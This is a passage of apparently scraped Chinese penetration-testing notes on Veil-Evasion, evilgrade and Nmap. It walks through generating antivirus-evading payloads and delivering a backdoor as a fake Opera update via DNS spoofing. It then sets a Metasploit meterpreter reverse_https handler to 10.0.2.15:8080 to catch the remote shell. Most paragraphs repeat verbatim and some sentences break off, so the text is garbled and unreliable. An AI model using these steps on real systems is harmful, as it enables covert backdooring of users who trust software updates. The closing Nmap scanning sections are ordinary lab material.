veil使用
veil 有两个免杀的工具,Evasion 和Ordnance。
Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀
我们一般选择Evasion,使用list可以查看到41种stager,使用go和ruby语言encode的编码方式。
试一下使用go生成,输入监听的主机和端口就可以,然后再设定生成的payload名字,因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
veil 有两个免杀的工具,Evasion 和Ordnance。
Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀
我们一般选择Evasion,使用list可以查看到41种stager,使用go和ruby语言encode的编码方式。
试一下使用go生成,输入监听的主机和端口就可以,然后再设定生成的payload名字,因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
evilgrade 是一个模块化框架,用于欺骗、注入攻击负载以及创建伪装成现有应用程序更新的后门。当您的目标计算机已完全修补或经常自我更新以作为安全措施时,它非常有用。
干净且易于安装和使用,带有预制二进制文件(代理)
具有可快速进行渗透测试的默认配置,拥有自己的WebServer和DNS服务器模块。
支持 DNS 篡改、DNS 缓存中毒、ARP 欺骗、Wi-Fi 接入点模拟、DHCP 劫持和主机名重定向等攻击
干净且易于安装和使用,带有预制二进制文件(代理)
具有可快速进行渗透测试的默认配置,拥有自己的WebServer和DNS服务器模块。
支持 DNS 篡改、DNS 缓存中毒、ARP 欺骗、Wi-Fi 接入点模拟、DHCP 劫持和主机名重定向等攻击
Evilgrade框架可以通过模拟中间人(MITM)攻击来对操作系统进行安全审计。这种攻击在攻击者拥有DNS访问权限和欺骗能力的情况下有效。Evilgrade使用更新不当的系统实用程序作为攻击媒介。Evilgrade支持的一些标准实用程序包括Notepad++、Ccleaner、Teamviewer、Virtualbox、Filezilla、Skype 和VMware。
当客户端打开其中一个未经过良好升级的实用程序时,Evilgrade会通过MITM攻击向客户端发送(伪造的)更新消息。该消息包含一个有效负载,可间接访问目标系统。如果客户端安装更新,则会在目标系统上下载后门,可以通过Metasploit等程序远程用该后门。
当客户端打开其中一个未经过良好升级的实用程序时,Evilgrade会通过MITM攻击向客户端发送(伪造的)更新消息。该消息包含一个有效负载,可间接访问目标系统。如果客户端安装更新,则会在目标系统上下载后门,可以通过Metasploit等程序远程用该后门。
假设我们的目标运行的是“opera浏览器。我们将尝试动持浏览器的”更新功能,并将网站重定向到攻击者的首选位置,可
以在该位置下载恶意可执行文件。
要选择要配置的程序,请键入“configureopera”,然后键入“showoptions以查所有可能需要配置的选项。要配置选项,1使用“set”命令,然后指定选项并输入与该选项相关的值
例如:(evilgrade (opera)>set agent /var/www/html/Evil-Files/rev-https-8080.exe)
因此,我们在这里设置了名为代理的选项,并提供了可执行文件的确切位置。
现在我们需要进行基本的DNS欺骗攻击,并将”www.opera.com重定向到evilgrade。让我们从配置“mitmf.conf”文件开始。为此,请输入“leafpad/etc/mitmf/mitmf.conf”。为了避免与DNS相关的任何冲突,我们需要将端口号从53更改为5353,因为evilgrade在端口53上运行。然后我们需要在A”记录中添加Opera的虚拟主机地址。
以在该位置下载恶意可执行文件。
要选择要配置的程序,请键入“configureopera”,然后键入“showoptions以查所有可能需要配置的选项。要配置选项,1使用“set”命令,然后指定选项并输入与该选项相关的值
例如:(evilgrade (opera)>set agent /var/www/html/Evil-Files/rev-https-8080.exe)
因此,我们在这里设置了名为代理的选项,并提供了可执行文件的确切位置。
现在我们需要进行基本的DNS欺骗攻击,并将”www.opera.com重定向到evilgrade。让我们从配置“mitmf.conf”文件开始。为此,请输入“leafpad/etc/mitmf/mitmf.conf”。为了避免与DNS相关的任何冲突,我们需要将端口号从53更改为5353,因为evilgrade在端口53上运行。然后我们需要在A”记录中添加Opera的虚拟主机地址。
程序启动后,输入(useexploit/multi/handler)来使用漏洞exploit/multi/handler”。需要根据使用Veil-Evasion创建的后门来设置有效载荷。创建了与针对Windows设备的”meterpreter/reverse_https相关的后门,因此有效载荷应设置为“reverse_https。要设置有效载荷类型(setPAYLOADwindows/meterpreter/reverse_https)。要显示需要设置的所有可用选项,请输入“showoptions”
现在将“LHOST选项设置为Kali机器的IP地址(设置LHOST10.0.2.15),将LPORT设置为后门将运行的端口(设置LPORT8080),然后通过输入“exploit开始攻击。
现在将“LHOST选项设置为Kali机器的IP地址(设置LHOST10.0.2.15),将LPORT设置为后门将运行的端口(设置LPORT8080),然后通过输入“exploit开始攻击。
什么是 Nmap 脚本引擎?
Nmap 的另一个强大功能是能够使用各种脚本运行扫描,以自动化您的工作或根据您的需要自定义安全审核。您可以使用这些脚本通过其原生的Nmap 脚本引擎(NSE) 从 Nmap 中获得更大的多功能性和功能性。
NSE 附带了大量脚本。其中许多脚本是由安全专业人员创建和维护的,他们随着漏洞和攻击的发展而不断为这些脚本做出贡献。在开始每个会话之前,请运行命令 <nmap –script-updatedb>(如果您不是 root 帐户,则需要 <sudo>)。
这些脚本按网络发现、复杂版本检测、漏洞检测、后门检测和漏洞利用进行分类。一些脚本使用简单技术,另一些脚本使用复杂技术。您还可以使用 Lua 编程语言创建自己的脚本。
Nmap 的另一个强大功能是能够使用各种脚本运行扫描,以自动化您的工作或根据您的需要自定义安全审核。您可以使用这些脚本通过其原生的Nmap 脚本引擎(NSE) 从 Nmap 中获得更大的多功能性和功能性。
NSE 附带了大量脚本。其中许多脚本是由安全专业人员创建和维护的,他们随着漏洞和攻击的发展而不断为这些脚本做出贡献。在开始每个会话之前,请运行命令 <nmap –script-updatedb>(如果您不是 root 帐户,则需要 <sudo>)。
这些脚本按网络发现、复杂版本检测、漏洞检测、后门检测和漏洞利用进行分类。一些脚本使用简单技术,另一些脚本使用复杂技术。您还可以使用 Lua 编程语言创建自己的脚本。
隐形扫描
隐形扫描是通过发送 SYN 数据包并分析响应来执行的。如果收到 SYN/ACK,则表示端口已打开,您可以打开 TCP 连接。
然而,隐形扫描永远不会完成三次握手,这使得目标很难确定扫描系统。
> nmap -sS scanmenmap\org
您可以使用“-sS”命令执行隐形扫描。请记住,隐形扫描速度较慢,且不如其他类型的扫描那么积极,因此可能需要等待一段时间才能获得响应。
隐形扫描是通过发送 SYN 数据包并分析响应来执行的。如果收到 SYN/ACK,则表示端口已打开,您可以打开 TCP 连接。
然而,隐形扫描永远不会完成三次握手,这使得目标很难确定扫描系统。
> nmap -sS scanmenmap\org
您可以使用“-sS”命令执行隐形扫描。请记住,隐形扫描速度较慢,且不如其他类型的扫描那么积极,因此可能需要等待一段时间才能获得响应。
禅地图
Zenmap 是 Nmap 的图形用户界面。它是一款免费的开源软件,可帮助您启动和运行 Nmap。
XML 输出
Nmap 扫描结果也可以导出为 XML。这也是大多数渗透测试工具的首选文件格式,因此在导入扫描结果时很容易解析。
可以使用 -oA 命令一次以所有可用格式导出扫描结果。
上述命令将把扫描结果导出到三个文件中——output.xml、output.nmap和output.gnmap。
Zenmap 是 Nmap 的图形用户界面。它是一款免费的开源软件,可帮助您启动和运行 Nmap。
XML 输出
Nmap 扫描结果也可以导出为 XML。这也是大多数渗透测试工具的首选文件格式,因此在导入扫描结果时很容易解析。
可以使用 -oA 命令一次以所有可用格式导出扫描结果。
上述命令将把扫描结果导出到三个文件中——output.xml、output.nmap和output.gnmap。
Zenmap 最具视觉吸引力的方面可能是其网络拓扑映射器。这里使用它以交互方式探索源机器和一些有趣的网站之间的路由,并使用中文翻译。
SE 改进
Nmap 脚本引擎 (NSE)是 Nmap 最强大、最灵活的功能之一。它允许用户编写(和共享)简单的Lua 脚本来自动执行各种网络任务。然后,这些脚本将以 Nmap 所期望的速度和效率并行执行。NSE 的学习曲线低且网络库强大,使其成为快速开发安全扫描和服务探测脚本的理想选择。
脚本数量从 348 个增加到 515 个!减去 4 个删除,新增了 171 个脚本。其中,109 个脚本会在使用 -sC 时默认运行,另外 35 个脚本会在使用 -sV 进行版本检测时运行。
SE 改进
Nmap 脚本引擎 (NSE)是 Nmap 最强大、最灵活的功能之一。它允许用户编写(和共享)简单的Lua 脚本来自动执行各种网络任务。然后,这些脚本将以 Nmap 所期望的速度和效率并行执行。NSE 的学习曲线低且网络库强大,使其成为快速开发安全扫描和服务探测脚本的理想选择。
脚本数量从 348 个增加到 515 个!减去 4 个删除,新增了 171 个脚本。其中,109 个脚本会在使用 -sC 时默认运行,另外 35 个脚本会在使用 -sV 进行版本检测时运行。
生成 SQLite 数据源
首先,需要一些 XML 格式的 Nmap 结果。可以运行任何nmap命令-oA myoutput来生成XML输出。这将生成所有 (A) 格式(包括 XML)的输出。
用户@ubuntu:~$ sudo nmap -sV -F --script=http-title,ssl-cert -oA myoutput 10.0.0.0/24
此命令将创建一个文件myoutput.xml。我们在这里使用的两个脚本(http-title / ssl-cert)是非侵入式的,但可以提供对服务的宝贵见解。脚本和仪表板包括用于解析这两个脚本结果的查询。使用其他脚本(例如 Microsoft SMB 或其他协议),扩展 python 脚本和仪表板查询以针对特定用例进行自定义将非常容易。
首先,需要一些 XML 格式的 Nmap 结果。可以运行任何nmap命令-oA myoutput来生成XML输出。这将生成所有 (A) 格式(包括 XML)的输出。
用户@ubuntu:~$ sudo nmap -sV -F --script=http-title,ssl-cert -oA myoutput 10.0.0.0/24
此命令将创建一个文件myoutput.xml。我们在这里使用的两个脚本(http-title / ssl-cert)是非侵入式的,但可以提供对服务的宝贵见解。脚本和仪表板包括用于解析这两个脚本结果的查询。使用其他脚本(例如 Microsoft SMB 或其他协议),扩展 python 脚本和仪表板查询以针对特定用例进行自定义将非常容易。
基本扫描
扫描类型- 这告诉 Nmap 将执行哪种类型的扫描,例如:-sS 表示 TCP SYN 扫描,-sU 表示 UDP 扫描,或 -sn 表示 ping 扫描。
选项- 这允许您指定扫描的其他元素,例如:-O 表示操作系统、-p 表示端口范围或 -A 表示详细信息。
目标- 将目标定义为单个 IP 地址、IP 地址范围或域。
在Nmap 备忘单:所有命令、标志和开关中,以易于使用的格式找到它们。
精心设计的扫描被认为是使用 Nmap 扫描漏洞的基础。此类扫描的结果将返回有关哪些端口已打开以及在这些端口上运行哪些服务的信息。
使用<nmap -p- -A <目标IP>>的命令执行这样的扫描。
此命令指示 Nmap 使用 -p- 标志扫描所有端口,并使用 -A 标志返回有关目标主机的详细信息。然后可以使用这些结果来识别目标主机上存在的潜在安全风险和漏洞。
扫描类型- 这告诉 Nmap 将执行哪种类型的扫描,例如:-sS 表示 TCP SYN 扫描,-sU 表示 UDP 扫描,或 -sn 表示 ping 扫描。
选项- 这允许您指定扫描的其他元素,例如:-O 表示操作系统、-p 表示端口范围或 -A 表示详细信息。
目标- 将目标定义为单个 IP 地址、IP 地址范围或域。
在Nmap 备忘单:所有命令、标志和开关中,以易于使用的格式找到它们。
精心设计的扫描被认为是使用 Nmap 扫描漏洞的基础。此类扫描的结果将返回有关哪些端口已打开以及在这些端口上运行哪些服务的信息。
使用<nmap -p- -A <目标IP>>的命令执行这样的扫描。
此命令指示 Nmap 使用 -p- 标志扫描所有端口,并使用 -A 标志返回有关目标主机的详细信息。然后可以使用这些结果来识别目标主机上存在的潜在安全风险和漏洞。